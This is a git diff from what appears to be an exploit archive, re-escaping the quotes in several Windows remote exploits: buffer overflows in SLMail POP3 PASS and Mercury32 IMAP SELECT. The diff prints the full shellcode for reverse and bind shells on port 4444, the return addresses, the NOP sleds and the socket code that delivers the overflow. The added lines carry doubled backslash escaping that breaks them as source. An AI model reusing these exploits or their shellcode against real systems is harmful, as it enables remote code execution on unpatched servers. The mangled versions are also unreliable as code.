+	print \"\\nSending evil buffer...\"
+	s.connect((\'192.168.1.167\',110))
 	data = s.recv(1024)
-	s.send('USER username' +'\r\n')
+	s.send(\'USER username\' +\'\\r\\n\')
 	data = s.recv(1024)
-	s.send('PASS ' + buffer + '\r\n')
+	s.send(\'PASS \' + buffer + \'\\r\\n\')
 	data = s.recv(1024)
 	s.close()
-	print "\nDone! Try connecting to port 4444 on victim machine."
+	print \"\\nDone! Try connecting to port 4444 on victim machine.\"
 except:
-	print "Could not connect to POP3!"
+	print \"Could not connect to POP3!\"
 
 # milw0rm.com [2004-11-18]
diff --git a/platforms/windows/remote/643.c b/platforms/windows/remote/643.c
index 670dd0d2f..8ec217489 100755
--- a/platforms/windows/remote/643.c
+++ b/platforms/windows/remote/643.c
@@ -9,29 +9,29 @@
 #include <netdb.h>
 #include <string.h>
  
-define retadd "\x9f\x45\x3a\x77" /*win2k server sp4 0x773a459f*/
+define retadd \"\\x9f\\x45\\x3a\\x77\" /*win2k server sp4 0x773a459f*/
 #define port 110
 
 /* revshell العراق القراصنة المجموعة*/
 char shellcode[] =
-"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
-"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
-"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
-"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
-"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
-"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
-"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
-"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
-"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
-"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x68"
-"\x7f\x00\x00\x01\x66\x68\x10\xe1\x66\x53\x89\xe1\x95\x68\xec\xf9"
-"\xaa\x60\x57\xff\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68"
-"\x63\x6d\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3"
-"\xaa\x95\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab"
-"\x68\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51"
-"\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53\xff\xd6"
-"\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6\x79\xff\x75\x04\xff\xd6"
-"\xff\x77\xfc\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0";
+\"\\xfc\\x6a\\xeb\\x4d\\xe8\\xf9\\xff\\xff\\xff\\x60\\x8b\\x6c\\x24\\x24\\x8b\\x45\"
+\"\\x3c\\x8b\\x7c\\x05\\x78\\x01\\xef\\x8b\\x4f\\x18\\x8b\\x5f\\x20\\x01\\xeb\\x49\"
+\"\\x8b\\x34\\x8b\\x01\\xee\\x31\\xc0\\x99\\xac\\x84\\xc0\\x74\\x07\\xc1\\xca\\x0d\"
+\"\\x01\\xc2\\xeb\\xf4\\x3b\\x54\\x24\\x28\\x75\\xe5\\x8b\\x5f\\x24\\x01\\xeb\\x66\"
+\"\\x8b\\x0c\\x4b\\x8b\\x5f\\x1c\\x01\\xeb\\x03\\x2c\\x8b\\x89\\x6c\\x24\\x1c\\x61\"
+\"\\xc3\\x31\\xdb\\x64\\x8b\\x43\\x30\\x8b\\x40\\x0c\\x8b\\x70\\x1c\\xad\\x8b\\x40\"
+\"\\x08\\x5e\\x68\\x8e\\x4e\\x0e\\xec\\x50\\xff\\xd6\\x66\\x53\\x66\\x68\\x33\\x32\"
+\"\\x68\\x77\\x73\\x32\\x5f\\x54\\xff\\xd0\\x68\\xcb\\xed\\xfc\\x3b\\x50\\xff\\xd6\"
+\"\\x5f\\x89\\xe5\\x66\\x81\\xed\\x08\\x02\\x55\\x6a\\x02\\xff\\xd0\\x68\\xd9\\x09\"
+\"\\xf5\\xad\\x57\\xff\\xd6\\x53\\x53\\x53\\x53\\x43\\x53\\x43\\x53\\xff\\xd0\\x68\"
+\"\\x7f\\x00\\x00\\x01\\x66\\x68\\x10\\xe1\\x66\\x53\\x89\\xe1\\x95\\x68\\xec\\xf9\"
+\"\\xaa\\x60\\x57\\xff\\xd6\\x6a\\x10\\x51\\x55\\xff\\xd0\\x66\\x6a\\x64\\x66\\x68\"
+\"\\x63\\x6d\\x6a\\x50\\x59\\x29\\xcc\\x89\\xe7\\x6a\\x44\\x89\\xe2\\x31\\xc0\\xf3\"
+\"\\xaa\\x95\\x89\\xfd\\xfe\\x42\\x2d\\xfe\\x42\\x2c\\x8d\\x7a\\x38\\xab\\xab\\xab\"
+\"\\x68\\x72\\xfe\\xb3\\x16\\xff\\x75\\x28\\xff\\xd6\\x5b\\x57\\x52\\x51\\x51\\x51\"
+\"\\x6a\\x01\\x51\\x51\\x55\\x51\\xff\\xd0\\x68\\xad\\xd9\\x05\\xce\\x53\\xff\\xd6\"
+\"\\x6a\\xff\\xff\\x37\\xff\\xd0\\x68\\xe7\\x79\\xc6\\x79\\xff\\x75\\x04\\xff\\xd6\"
+\"\\xff\\x77\\xfc\\xff\\xd0\\x68\\xf0\\x8a\\x04\\x5f\\x53\\xff\\xd6\\xff\\xd0\";
  
 struct sockaddr_in plm,lar,target;
  
@@ -45,10 +45,10 @@ int conn(char *ip)
  sockfd = socket(AF_INET,SOCK_STREAM,0);
 if((connect(sockfd,(struct sockaddr *)&plm,sizeof(struct sockaddr))) < 0)
 {
- perror("[-] connect error!");
+ perror(\"[-] connect error!\");
  exit(0);
 }
- printf("[*] Connected to: %s.\n",ip);
+ printf(\"[*] Connected to: %s.\\n\",ip);
  return sockfd;
 }
  
@@ -69,17 +69,17 @@ int main(int argc, char *argv[])
     strcat(buffer, nop);
     strcat(buffer, shellcode);
 
-    printf("[+] SLMAIL Remote buffer overflow exploit in POP3 PASS by Haroon Rashid Astwat.\n");
-    xs = conn("192.168.224.144");
+    printf(\"[+] SLMAIL Remote buffer overflow exploit in POP3 PASS by Haroon Rashid Astwat.\\n\");
+    xs = conn(\"192.168.224.144\");
     read(xs, out, 1024);
-    printf("[*] %s", out);
-    write(xs,"USER username\r\n", 15);
+    printf(\"[*] %s\", out);
+    write(xs,\"USER username\\r\\n\", 15);
     read(xs, out, 1024);
-    printf("[*] %s", out);
-    write(xs,"PASS ",5);
+    printf(\"[*] %s\", out);
+    write(xs,\"PASS \",5);
     write(xs,buffer,strlen(buffer));
-    printf("Shellcode len: %d bytes\n",strlen(shellcode));
-    printf("Buffer len: %d bytes\n",strlen(buffer));
-    write(xs,"\r\n",4);
+    printf(\"Shellcode len: %d bytes\\n\",strlen(shellcode));
+    printf(\"Buffer len: %d bytes\\n\",strlen(buffer));
+    write(xs,\"\\r\\n\",4);
     close(xs);  
 }
\ No newline at end of file
diff --git a/platforms/windows/remote/646.c b/platforms/windows/remote/646.c
index c24c9e1df..bdf1976c6 100755
--- a/platforms/windows/remote/646.c
+++ b/platforms/windows/remote/646.c
@@ -10,36 +10,36 @@ SLMAIL REMOTE PASSWD BOF - Ivan Ivanovic Ivanov Иван-дурак
 
 // [*] bind 4444 
 unsigned char shellcode[] = 
-"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
-"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
-"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
-"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
-"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
-"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
-"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
-"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
-"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
-"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
-"\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
-"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
-"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
-"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
-"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
-"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
-"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
-"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
-"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
-"\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0";
+\"\\xfc\\x6a\\xeb\\x4d\\xe8\\xf9\\xff\\xff\\xff\\x60\\x8b\\x6c\\x24\\x24\\x8b\\x45\"
+\"\\x3c\\x8b\\x7c\\x05\\x78\\x01\\xef\\x8b\\x4f\\x18\\x8b\\x5f\\x20\\x01\\xeb\\x49\"
+\"\\x8b\\x34\\x8b\\x01\\xee\\x31\\xc0\\x99\\xac\\x84\\xc0\\x74\\x07\\xc1\\xca\\x0d\"
+\"\\x01\\xc2\\xeb\\xf4\\x3b\\x54\\x24\\x28\\x75\\xe5\\x8b\\x5f\\x24\\x01\\xeb\\x66\"
+\"\\x8b\\x0c\\x4b\\x8b\\x5f\\x1c\\x01\\xeb\\x03\\x2c\\x8b\\x89\\x6c\\x24\\x1c\\x61\"
+\"\\xc3\\x31\\xdb\\x64\\x8b\\x43\\x30\\x8b\\x40\\x0c\\x8b\\x70\\x1c\\xad\\x8b\\x40\"
+\"\\x08\\x5e\\x68\\x8e\\x4e\\x0e\\xec\\x50\\xff\\xd6\\x66\\x53\\x66\\x68\\x33\\x32\"
+\"\\x68\\x77\\x73\\x32\\x5f\\x54\\xff\\xd0\\x68\\xcb\\xed\\xfc\\x3b\\x50\\xff\\xd6\"
+\"\\x5f\\x89\\xe5\\x66\\x81\\xed\\x08\\x02\\x55\\x6a\\x02\\xff\\xd0\\x68\\xd9\\x09\"
+\"\\xf5\\xad\\x57\\xff\\xd6\\x53\\x53\\x53\\x53\\x53\\x43\\x53\\x43\\x53\\xff\\xd0\"
+\"\\x66\\x68\\x11\\x5c\\x66\\x53\\x89\\xe1\\x95\\x68\\xa4\\x1a\\x70\\xc7\\x57\\xff\"
+\"\\xd6\\x6a\\x10\\x51\\x55\\xff\\xd0\\x68\\xa4\\xad\\x2e\\xe9\\x57\\xff\\xd6\\x53\"
+\"\\x55\\xff\\xd0\\x68\\xe5\\x49\\x86\\x49\\x57\\xff\\xd6\\x50\\x54\\x54\\x55\\xff\"
+\"\\xd0\\x93\\x68\\xe7\\x79\\xc6\\x79\\x57\\xff\\xd6\\x55\\xff\\xd0\\x66\\x6a\\x64\"
+\"\\x66\\x68\\x63\\x6d\\x89\\xe5\\x6a\\x50\\x59\\x29\\xcc\\x89\\xe7\\x6a\\x44\\x89\"
+\"\\xe2\\x31\\xc0\\xf3\\xaa\\xfe\\x42\\x2d\\xfe\\x42\\x2c\\x93\\x8d\\x7a\\x38\\xab\"
+\"\\xab\\xab\\x68\\x72\\xfe\\xb3\\x16\\xff\\x75\\x44\\xff\\xd6\\x5b\\x57\\x52\\x51\"
+\"\\x51\\x51\\x6a\\x01\\x51\\x51\\x55\\x51\\xff\\xd0\\x68\\xad\\xd9\\x05\\xce\\x53\"
+\"\\xff\\xd6\\x6a\\xff\\xff\\x37\\xff\\xd0\\x8b\\x57\\xfc\\x83\\xc4\\x64\\xff\\xd6\"
+\"\\x52\\xff\\xd0\\x68\\xf0\\x8a\\x04\\x5f\\x53\\xff\\xd6\\xff\\xd0\";
 
 void exploit(int sock) {
       FILE *test;
       int *ptr;
-      char userbuf[] = "USER madivan\r\n";
+      char userbuf[] = \"USER madivan\\r\\n\";
       char evil[3001];
       char buf[3012];
       char receive[1024];
-      char nopsled[] = "\x90\x90\x90\x90\x90\x90\x90\x90"
-                       "\x90\x90\x90\x90\x90\x90\x90\x90";
+      char nopsled[] = \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
+                       \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\";
       memset(buf, 0x00, 3012);
       memset(evil, 0x00, 3001);
       memset(evil, 0x43, 3000);
@@ -52,20 +52,20 @@ void exploit(int sock) {
 
       // banner
       recv(sock, receive, 200, 0);
-      printf("[+] %s", receive);
+      printf(\"[+] %s\", receive);
       // user
-      printf("[+] Sending Username...\n");
+      printf(\"[+] Sending Username...\\n\");
       send(sock, userbuf, strlen(userbuf), 0);
       recv(sock, receive, 200, 0);
-      printf("[+] %s", receive);
+      printf(\"[+] %s\", receive);
       // passwd
-      printf("[+] Sending Evil buffer...\n");
-      sprintf(buf, "PASS %s\r\n", evil);
-      //test = fopen("test.txt", "w");
-      //fprintf(test, "%s", buf);
+      printf(\"[+] Sending Evil buffer...\\n\");
+      sprintf(buf, \"PASS %s\\r\\n\", evil);
+      //test = fopen(\"test.txt\", \"w\");
+      //fprintf(test, \"%s\", buf);
       //fclose(test);
       send(sock, buf, strlen(buf), 0);
-      printf("[*] Done! Connect to the host on port 4444...\n\n");
+      printf(\"[*] Done! Connect to the host on port 4444...\\n\\n\");
 }
 
 int connect_target(char *host, u_short port)
@@ -80,23 +80,23 @@ int connect_target(char *host, u_short port)
 
     hp = gethostbyname(host);
     if (hp == NULL) {
-        printf("gethostbyname() error!\n"); exit(0);
+        printf(\"gethostbyname() error!\\n\"); exit(0);
     }
-    printf("[+] Connecting to %s\n", host);
+    printf(\"[+] Connecting to %s\\n\", host);
     sa.sin_family = AF_INET;
     sa.sin_port = htons(port);
     sa.sin_addr = **((struct in_addr **) hp->h_addr_list);
 
     sock = socket(AF_INET, SOCK_STREAM, 0);
     if (sock < 0)      {
-        printf("[-] socket blah?\n");
+        printf(\"[-] socket blah?\\n\");
         exit(0);
         }
     if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0)
-        {printf("[-] connect() blah!\n");
+        {printf(\"[-] connect() blah!\\n\");
         exit(0);
           }
-    printf("[+] Connected to %s\n", host);
+    printf(\"[+] Connected to %s\\n\", host);
     return sock;
 }
 
@@ -105,9 +105,9 @@ int main(int argc, char **argv)
 {
     int sock = 0;
     int data, port;
-    printf("\n[$] SLMail Server POP3 PASSWD Buffer Overflow exploit\n");
-    printf("[$] by Mad Ivan [ void31337 team ] - http://exploit.void31337.ru\n\n");
-    if ( argc < 2 ) { printf("usage: slmail-ex.exe <host> \n\n"); exit(0); }
+    printf(\"\\n[$] SLMail Server POP3 PASSWD Buffer Overflow exploit\\n\");
+    printf(\"[$] by Mad Ivan [ void31337 team ] - http://exploit.void31337.ru\\n\\n\");
+    if ( argc < 2 ) { printf(\"usage: slmail-ex.exe <host> \\n\\n\"); exit(0); }
     port = 110;
     sock = connect_target(argv[1], port);
     exploit(sock);
diff --git a/platforms/windows/remote/663.py b/platforms/windows/remote/663.py
index ab32052ca..1dd31098d 100755
--- a/platforms/windows/remote/663.py
+++ b/platforms/windows/remote/663.py
@@ -18,30 +18,30 @@ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
 # Lame calc.exe shellcode - dont expect miracles!
 
-sc2 = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x29\x81\x73\x17\xb1\x74"
-sc2 += "\x3f\x7c\x83\xeb\xfc\xe2\xf4\x4d\x9c\x69\x7c\xb1\x74\x6c\x29\xe7"
-sc2 += "\x23\xb4\x10\x95\x6c\xb4\x39\x8d\xff\x6b\x79\xc9\x75\xd5\xf7\xfb"
-sc2 += "\x6c\xb4\x26\x91\x75\xd4\x9f\x83\x3d\xb4\x48\x3a\x75\xd1\x4d\x4e"
-sc2 += "\x88\x0e\xbc\x1d\x4c\xdf\x08\xb6\xb5\xf0\x71\xb0\xb3\xd4\x8e\x8a"
-sc2 += "\x08\x1b\x68\xc4\x95\xb4\x26\x95\x75\xd4\x1a\x3a\x78\x74\xf7\xeb"
-sc2 += "\x68\x3e\x97\x3a\x70\xb4\x7d\x59\x9f\x3d\x4d\x71\x2b\x61\x21\xea"
-sc2 += "\xb6\x37\x7c\xef\x1e\x0f\x25\xd5\xff\x26\xf7\xea\x78\xb4\x27\xad"
-sc2 += "\xff\x24\xf7\xea\x7c\x6c\x14\x3f\x3a\x31\x90\x4e\xa2\xb6\xbb\x5a"
-sc2 += "\x6c\x6c\x14\x29\x8a\xb5\x72\x4e\xa2\xc0\xac\xe2\x1c\xcf\xf6\xb5"
-sc2 += "\x2b\xc0\xaa\xdb\x74\xc0\xac\x4e\xa4\x55\x7c\x59\x95\xc0\x83\x4e"
-sc2 += "\x17\x5e\x10\xd2\x5a\x5a\x04\xd4\x74\x3f\x7c"
+sc2 = \"\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x31\\xc9\\xb1\\x29\\x81\\x73\\x17\\xb1\\x74\"
+sc2 += \"\\x3f\\x7c\\x83\\xeb\\xfc\\xe2\\xf4\\x4d\\x9c\\x69\\x7c\\xb1\\x74\\x6c\\x29\\xe7\"
+sc2 += \"\\x23\\xb4\\x10\\x95\\x6c\\xb4\\x39\\x8d\\xff\\x6b\\x79\\xc9\\x75\\xd5\\xf7\\xfb\"
+sc2 += \"\\x6c\\xb4\\x26\\x91\\x75\\xd4\\x9f\\x83\\x3d\\xb4\\x48\\x3a\\x75\\xd1\\x4d\\x4e\"
+sc2 += \"\\x88\\x0e\\xbc\\x1d\\x4c\\xdf\\x08\\xb6\\xb5\\xf0\\x71\\xb0\\xb3\\xd4\\x8e\\x8a\"
+sc2 += \"\\x08\\x1b\\x68\\xc4\\x95\\xb4\\x26\\x95\\x75\\xd4\\x1a\\x3a\\x78\\x74\\xf7\\xeb\"
+sc2 += \"\\x68\\x3e\\x97\\x3a\\x70\\xb4\\x7d\\x59\\x9f\\x3d\\x4d\\x71\\x2b\\x61\\x21\\xea\"
+sc2 += \"\\xb6\\x37\\x7c\\xef\\x1e\\x0f\\x25\\xd5\\xff\\x26\\xf7\\xea\\x78\\xb4\\x27\\xad\"
+sc2 += \"\\xff\\x24\\xf7\\xea\\x7c\\x6c\\x14\\x3f\\x3a\\x31\\x90\\x4e\\xa2\\xb6\\xbb\\x5a\"
+sc2 += \"\\x6c\\x6c\\x14\\x29\\x8a\\xb5\\x72\\x4e\\xa2\\xc0\\xac\\xe2\\x1c\\xcf\\xf6\\xb5\"
+sc2 += \"\\x2b\\xc0\\xaa\\xdb\\x74\\xc0\\xac\\x4e\\xa4\\x55\\x7c\\x59\\x95\\xc0\\x83\\x4e\"
+sc2 += \"\\x17\\x5e\\x10\\xd2\\x5a\\x5a\\x04\\xd4\\x74\\x3f\\x7c\"
 
 #Change RET Address as needed
-buffer = '\x41'*260 +  struct.pack('<L', 0x782f28f7)+ '\x90'*32+sc2
+buffer = \'\\x41\'*260 +  struct.pack(\'<L\', 0x782f28f7)+ \'\\x90\'*32+sc2
 
-print "\nSending evil buffer..."
-s.connect(('192.168.1.167',143))
-s.send('a001 LOGIN ftp ftp' + '\r\n')
+print \"\\nSending evil buffer...\"
+s.connect((\'192.168.1.167\',143))
+s.send(\'a001 LOGIN ftp ftp\' + \'\\r\\n\')
 data = s.recv(1024)
 sleep(3)
-s.send('A001 SELECT ' + buffer+'\r\n')
+s.send(\'A001 SELECT \' + buffer+\'\\r\\n\')
 data = s.recv(1024)
 s.close()
-print "\nDone! "
+print \"\\nDone! \"
 
 # milw0rm.com [2004-11-29]
diff --git a/platforms/windows/remote/668.c b/platforms/windows/remote/668.c
index 240519700..fca42febd 100755
--- a/platforms/windows/remote/668.c
+++ b/platforms/windows/remote/668.c
@@ -19,35 +19,35 @@
 #include <fcntl.h>
 #include <sys/time.h>
 
-#define version         "1.0"
+#define version         \"1.0\"
 int usage(char *p);
 
 
 char sc_bind[] =
     //decoder
-    "\xEB\x0F\x5B\x80\x33\x96\x43\x81\x3B\x45\x59\x34\x53\x75\xF4\x74"
-    "\x05\xE8\xEC\xFF\xFF\xFF"
+    \"\\xEB\\x0F\\x5B\\x80\\x33\\x96\\x43\\x81\\x3B\\x45\\x59\\x34\\x53\\x75\\xF4\\x74\"
+    \"\\x05\\xE8\\xEC\\xFF\\xFF\\xFF\"
     //sc_bind_1981 for 2k/xp/2003 v1.03.10.09 by ey4s
     //XOR with 0x96 (267 0x10B bytes)
-    "\x7E\xB2\x96\x96\x96\x22\xEB\x83\x0E\x5D\xD4\xE1\x2E\x4A\x4B\x8C"
-    "\xA5\x7F\x2D\x55\x38\x50\xBD\x2B\xB8\x48\xC1\xE4\x32\xB2\x24\xA4"
-    "\x96\x98\xCB\x5D\x48\xE2\xB4\xF5\x5E\xC9\xFC\xA6\xCD\xF2\x1D\x95"
-    "\x1D\xD6\x9A\x1D\xE6\x8A\x3B\x1D\xFE\x9E\xFC\x92\xCF\x7E\x12\x96"
-    "\x96\x96\x74\x6F\x23\x95\xBD\x77\xFE\xA5\xA4\x96\x96\xFE\xE1\xE5"
-    "\xA4\xC9\xC2\x69\xC1\x6E\x03\xFC\x93\xCF\x7E\xF1\x96\x96\x96\x74"
-    "\x6F\x1D\x61\xC7\xFE\x94\x96\x91\x2B\x1D\x7A\xC7\xC7\xC7\xC7\xFC"
-    "\x97\xFC\x94\x69\xC0\x66\x05\xFC\x86\xC3\xC5\x69\xC0\x62\xC6\xC5"
-    "\x69\xC0\x6E\x1D\x6A\xFC\x98\xCF\x3D\x74\x6B\xC6\xC6\xC5\x69\xC0"
-    "\x6A\x3D\x3D\x3D\xF0\x51\xD2\xB2\xBA\x97\x97\x1D\x42\xFE\xF5\xFB"
-    "\xF2\x96\x1D\x5A\xC5\xC6\xC1\xC4\xA5\x4D\xC5\xC5\xC5\xFC\x97\xC5"
-    "\xC5\xC7\xC5\x69\xC0\x76\xFC\x69\x69\xA1\x69\xC0\x4A\x69\xC0\x7A"
-    "\x69\xC0\x7A\x69\xC0\x7E\xC7\x1D\xE3\xAA\x1D\xE2\xB8\xEE\x95\x63"
-    "\xC0\x1D\xE0\xB6\x95\x63\xA5\x5F\xDF\xD7\x3B\x95\x53\xA5\x4D\xA5"
-    "\x44\x99\x28\x86\xAC\x40\xE2\x9E\x57\x5D\x8D\x95\x4C\xD6\x7D\x79"
-    "\xAD\x89\xE3\x73\xC8\x1D\xC8\xB2\x95\x4B\xF0\x1D\x9A\xDD\x1D\xC8"
-    "\x8A\x95\x4B\x1D\x92\x1D\x95\x53\x3D\xCF\x55"
+    \"\\x7E\\xB2\\x96\\x96\\x96\\x22\\xEB\\x83\\x0E\\x5D\\xD4\\xE1\\x2E\\x4A\\x4B\\x8C\"
+    \"\\xA5\\x7F\\x2D\\x55\\x38\\x50\\xBD\\x2B\\xB8\\x48\\xC1\\xE4\\x32\\xB2\\x24\\xA4\"
+    \"\\x96\\x98\\xCB\\x5D\\x48\\xE2\\xB4\\xF5\\x5E\\xC9\\xFC\\xA6\\xCD\\xF2\\x1D\\x95\"
+    \"\\x1D\\xD6\\x9A\\x1D\\xE6\\x8A\\x3B\\x1D\\xFE\\x9E\\xFC\\x92\\xCF\\x7E\\x12\\x96\"
+    \"\\x96\\x96\\x74\\x6F\\x23\\x95\\xBD\\x77\\xFE\\xA5\\xA4\\x96\\x96\\xFE\\xE1\\xE5\"
+    \"\\xA4\\xC9\\xC2\\x69\\xC1\\x6E\\x03\\xFC\\x93\\xCF\\x7E\\xF1\\x96\\x96\\x96\\x74\"
+    \"\\x6F\\x1D\\x61\\xC7\\xFE\\x94\\x96\\x91\\x2B\\x1D\\x7A\\xC7\\xC7\\xC7\\xC7\\xFC\"
+    \"\\x97\\xFC\\x94\\x69\\xC0\\x66\\x05\\xFC\\x86\\xC3\\xC5\\x69\\xC0\\x62\\xC6\\xC5\"
+    \"\\x69\\xC0\\x6E\\x1D\\x6A\\xFC\\x98\\xCF\\x3D\\x74\\x6B\\xC6\\xC6\\xC5\\x69\\xC0\"
+    \"\\x6A\\x3D\\x3D\\x3D\\xF0\\x51\\xD2\\xB2\\xBA\\x97\\x97\\x1D\\x42\\xFE\\xF5\\xFB\"
+    \"\\xF2\\x96\\x1D\\x5A\\xC5\\xC6\\xC1\\xC4\\xA5\\x4D\\xC5\\xC5\\xC5\\xFC\\x97\\xC5\"
+    \"\\xC5\\xC7\\xC5\\x69\\xC0\\x76\\xFC\\x69\\x69\\xA1\\x69\\xC0\\x4A\\x69\\xC0\\x7A\"
+    \"\\x69\\xC0\\x7A\\x69\\xC0\\x7E\\xC7\\x1D\\xE3\\xAA\\x1D\\xE2\\xB8\\xEE\\x95\\x63\"
+    \"\\xC0\\x1D\\xE0\\xB6\\x95\\x63\\xA5\\x5F\\xDF\\xD7\\x3B\\x95\\x53\\xA5\\x4D\\xA5\"
+    \"\\x44\\x99\\x28\\x86\\xAC\\x40\\xE2\\x9E\\x57\\x5D\\x8D\\x95\\x4C\\xD6\\x7D\\x79\"
+    \"\\xAD\\x89\\xE3\\x73\\xC8\\x1D\\xC8\\xB2\\x95\\x4B\\xF0\\x1D\\x9A\\xDD\\x1D\\xC8\"
+    \"\\x8A\\x95\\x4B\\x1D\\x92\\x1D\\x95\\x53\\x3D\\xCF\\x55\"
     //decoder end sign
-    "\x45\x59\x34\x53";
+    \"\\x45\\x59\\x34\\x53\";
 
 int             iType;
 int             iPort=143;
@@ -67,21 +67,21 @@ int main(int argc, char **argv)
     }
 
 
-    while((c = getopt(argc, argv, "u:P:h:p:")) != EOF) {
+    while((c = getopt(argc, argv, \"u:P:h:p:\")) != EOF) {
         switch(c) {
 
-        case 'u':
+        case \'u\':
             strncpy(username, optarg, sizeof (username) - 1);
             break;
 
-        case 'P':
+        case \'P\':
             strncpy(password, optarg, sizeof (password) - 1);
             break;
 
-        case 'h':
+        case \'h\':
             ip=optarg;
             break;
-        case 'p':
+        case \'p\':
             iPort=atoi(optarg);
             break;
         default:
@@ -94,7 +94,7 @@ int main(int argc, char **argv)
     if((!ip))
     {
         usage(argv[0]);
-        printf("[-] Invalid parameter.\n");
+        printf(\"[-] Invalid parameter.\\n\");
         return 0;
     }
 
@@ -117,7 +117,7 @@ void shell (int sock)
         if (FD_ISSET (0, &rfds)) {
             l = read (0, buf, sizeof (buf));
             if (l <= 0) {
-                printf("\n - Connection closed by local user\n");
+                printf(\"\\n - Connection closed by local user\\n\");
                 exit (EXIT_FAILURE);
             }
             write (sock, buf, l);
@@ -126,10 +126,10 @@ void shell (int sock)
         if (FD_ISSET (sock, &rfds)) {
             l = read (sock, buf, sizeof (buf));
             if (l == 0) {
-                printf ("\n - Connection closed by remote host.\n");
+                printf (\"\\n - Connection closed by remote host.\\n\");
                 exit (EXIT_FAILURE);
             } else if (l < 0) {
-                printf ("\n - Read failure\n");
+                printf (\"\\n - Read failure\\n\");
                 exit (EXIT_FAILURE);
             }
             write (1, buf, l);
@@ -149,20 +149,20 @@ int     SendExploit()
     char    szRecvBuff[0x1000];
     char *ip2=NULL;
 
-    printf( "MERCURY32 Imap exploit\n");
-    printf( "By: JohnH@secnetops.com\n");
-    printf("[+] Entering God Mode\n");
+    printf( \"MERCURY32 Imap exploit\\n\");
+    printf( \"By: JohnH@secnetops.com\\n\");
+    printf(\"[+] Entering God Mode\\n\");
 
     // Login
     memset(buffer2,0x0,sizeof(buffer2));
-    strcat(buffer2,"a001 LOGIN ");
+    strcat(buffer2,\"a001 LOGIN \");
     strcat(buffer2,username);
-    strcat(buffer2," ");
+    strcat(buffer2,\" \");
     strcat(buffer2,password);
-    strcat(buffer2,"\n");
+    strcat(buffer2,\"\\n\");
 
     bzero  (buffer,sizeof(buffer));
-    strcat(buffer,"a001 SELECT ");
+    strcat(buffer,\"a001 SELECT \");
     x = strlen(buffer);
     memset(buffer+x,0x41,260);
     x+=260;
@@ -172,13 +172,13 @@ int     SendExploit()
     x+=100;
     memcpy (buffer+x, sc_bind, strlen(sc_bind));
     x+=strlen(sc_bind);
-    memcpy(buffer+x,"\r\n",2);
+    memcpy(buffer+x,\"\\r\\n\",2);
     x+=2;
 
 
     if (!(he = gethostbyname(ip)))
     {
-        herror("Resolving host");
+        herror(\"Resolving host\");
         exit(EXIT_FAILURE);
     }
     in.s_addr = *((unsigned int *)he->h_addr);
